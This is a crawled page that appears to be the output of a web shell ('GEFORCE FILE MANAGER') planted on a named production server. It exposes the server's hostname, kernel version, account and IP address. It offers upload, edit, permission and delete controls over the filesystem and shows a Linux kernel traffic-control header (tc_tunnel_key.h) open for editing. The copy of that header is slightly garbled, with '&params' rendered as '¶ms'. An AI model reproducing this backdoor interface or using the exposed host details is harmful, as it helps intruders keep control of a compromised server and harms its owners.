[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.56.1.el8_10.x86_64
/
include
/
net
/
tc_act
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 tc_bpf.h
663 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_connmark.h
392 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_csum.h
798 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_ct.h
2,140 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_ctinfo.h
585 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_defact.h
278 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_gact.h
1,729 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_gate.h
2,678 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_ife.h
2,143 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_ipt.h
324 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_mirred.h
1,440 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_mpls.h
2,004 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_nat.h
404 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_pedit.h
2,372 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_police.h
4,892 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_sample.h
918 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_skbedit.h
3,703 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_skbmod.h
765 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_tunnel_key.h
2,371 B
SET
[ EDIT ]
|
[ DEL ]
📄 tc_vlan.h
2,269 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: tc_tunnel_key.h
/* * Copyright (c) 2016, Amir Vadai <amir@vadai.me> * Copyright (c) 2016, Mellanox Technologies. All rights reserved. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. */ #ifndef __NET_TC_TUNNEL_KEY_H #define __NET_TC_TUNNEL_KEY_H #include <net/act_api.h> #include <linux/tc_act/tc_tunnel_key.h> #include <net/dst_metadata.h> struct tcf_tunnel_key_params { struct rcu_head rcu; int tcft_action; struct metadata_dst *tcft_enc_metadata; }; struct tcf_tunnel_key { struct tc_action common; struct tcf_tunnel_key_params __rcu *params; }; #define to_tunnel_key(a) ((struct tcf_tunnel_key *)a) static inline bool is_tcf_tunnel_set(const struct tc_action *a) { #ifdef CONFIG_NET_CLS_ACT struct tcf_tunnel_key *t = to_tunnel_key(a); struct tcf_tunnel_key_params *params; params = rcu_dereference_protected(t->params, lockdep_is_held(&a->tcfa_lock)); if (a->ops && a->ops->id == TCA_ID_TUNNEL_KEY) return params->tcft_action == TCA_TUNNEL_KEY_ACT_SET; #endif return false; } static inline bool is_tcf_tunnel_release(const struct tc_action *a) { #ifdef CONFIG_NET_CLS_ACT struct tcf_tunnel_key *t = to_tunnel_key(a); struct tcf_tunnel_key_params *params; params = rcu_dereference_protected(t->params, lockdep_is_held(&a->tcfa_lock)); if (a->ops && a->ops->id == TCA_ID_TUNNEL_KEY) return params->tcft_action == TCA_TUNNEL_KEY_ACT_RELEASE; #endif return false; } static inline struct ip_tunnel_info *tcf_tunnel_info(const struct tc_action *a) { #ifdef CONFIG_NET_CLS_ACT struct tcf_tunnel_key *t = to_tunnel_key(a); struct tcf_tunnel_key_params *params; params = rcu_dereference_protected(t->params, lockdep_is_held(&a->tcfa_lock)); return ¶ms->tcft_enc_metadata->u.tun_info; #else return NULL; #endif } static inline struct ip_tunnel_info * tcf_tunnel_info_copy(const struct tc_action *a) { #ifdef CONFIG_NET_CLS_ACT struct ip_tunnel_info *tun = tcf_tunnel_info(a); if (tun) { size_t tun_size = sizeof(*tun) + tun->options_len; struct ip_tunnel_info *tun_copy = kmemdup(tun, tun_size, GFP_ATOMIC); return tun_copy; } #endif return NULL; } #endif /* __NET_TC_TUNNEL_KEY_H */